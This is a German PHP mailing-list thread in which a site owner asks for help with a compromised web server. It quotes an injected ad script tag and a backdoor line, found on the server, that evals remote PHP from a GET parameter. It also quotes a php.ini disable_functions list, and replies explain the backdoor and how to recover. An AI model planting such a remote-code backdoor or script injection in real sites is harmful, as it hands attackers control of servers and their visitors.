[php] Problem mit Hacker - eval sperren

[Niels Jende]

Yannik Hampe schrieb:
> ANGEL Harald wrote:
>   
>> Hallo phpListe!
>> Ich schreibe heute wegen eines ernsten Problems:
>> Ich habe seit einer Woche einen Hacker auf meinem Webserver, aber mein Provider findet leider nicht heraus, wie er ins System kommt bzw kann mir den Webserver nicht sicher machen.
>> Was der Hacker macht? Er fügt in meine Startseite eine Layerwerbung ein:
>> <script src="http://layer-ads.de/la-33101.js" type="text/javascript"></script>
>> durch die verdient er Geld - was einerseits schon mal eine Frechheit ist, andererseits bleibt dadurch der aufbau meiner Website stehen.
>>
>> Die Datei hat nach dem ändern den User www-data, und wenn ich die Zeile rauslösche ist sie nach 5min wieder drin :(
>> Hab jetzt schon rausgefunden, dass er meine komplette Seite mit seiner ersetz. Wie er das macht, keine Ahnung. Ausschließen kann ich, dass er root Zugriff auf den Server hat.
>>
>> Hab in einem anderen Script folgendes gefunden:
>> //a:9:{s:4:"lang";s:2:"en";s:9:"auth_pass";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:8:"quota_mb";i:0;s:17:
>> "upload_ext_filter";a:0:{}s:19:"download_ext_filter";a:0:{}s:15:"error_reporting";s:0:"";s:7:"fm_root";s:0:"";
>> s:17:"cookie_cache_time";i:1171902116;s:7:"version";s:5:"0.9.3";}
>> if(!empty($_GET['url']))eval(str_replace(Array('<?php', '<?', '?>')
>> ,Array('','','') ,implode('', file(stripslashes($_GET['url'])))));
>> }
>>
>> hab leider keine ahnung, was das macht, auf jeden Fall ist es nicht von mir.
>>     
>
> Kurz: Es ermöglicht jeder Person belibigen php-Quelltext jederzeit auf
> deinem Server auszuführen. Ich frag mich zwar, warum der typ es sich so
> schwer macht und nicht einfach include verwendet, aber die Wirkung
> sollte die Gleiche sein.
>   
>> Habe vom Provider den Befehl "eval" sperren lassen, aber das funktioniert anscheinend nicht.
>> Er hat in die php.ini folgendes eingetragen:
>> disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, eval, proc_open, escapeshellcmd
>>
>> nur leider funktioniert der Befehl eval noch immer.
>>
>> erste Frage: Was hats da mit dem eval? Kann man den nicht sperren? Wenn doch: Wie?
>>     
>
> Lass dir mal phpinfo() anzeigen. Prüfe nach, ob eval dort WIRKLICH
> deaktiviert ist.
> Es fehlen aber noch ein paar wichtige Infos:
> Geht es hier um einen root-Server? Wenn ja, DANN MACH IHN PLATT. Hol'
> dir alle Daten runter, und installiere das OS komplett neu. Du weisst ja
> nicht, was der Typ alles sonst noch so gemacht haben könnte.
>
>   

wenn er Opfer eines mscans geworden ist, was eine weitere Möglichkeit
wäre, so nützt ihm das diablen von eval eher gar nichts. Der mscan
schickt locker 10SYN Pakete pro Sekunde, da kommen selbst einige dicke
IDS ins trudeln. Auscert schrieb zu dieser Technik:" ...Dieses tool
ermöglicht dem Angreifer ganze Domains oder IP-Adressbereiche auf einmal
zu scannen, um bekannte Sicherheitslücken u.a. dieser Dienste zu
fiinden: statd, nfs, cgi-bin, Anwendungen (handler, phf u cgi-test), X,
POP3, IMAP, DNS, ..."
Dein Angreiefr kann Dich also auf vielfältige Art und Weisen gefunden
und übernommen haben. Aber ohne Tools wid es schwierig.

Wenn ich recht informiert bin, kann mscan oder auch multiscan
mittlerweile die Sicherheitslücken in PHP scannen und ausnutzen.

hth
Niels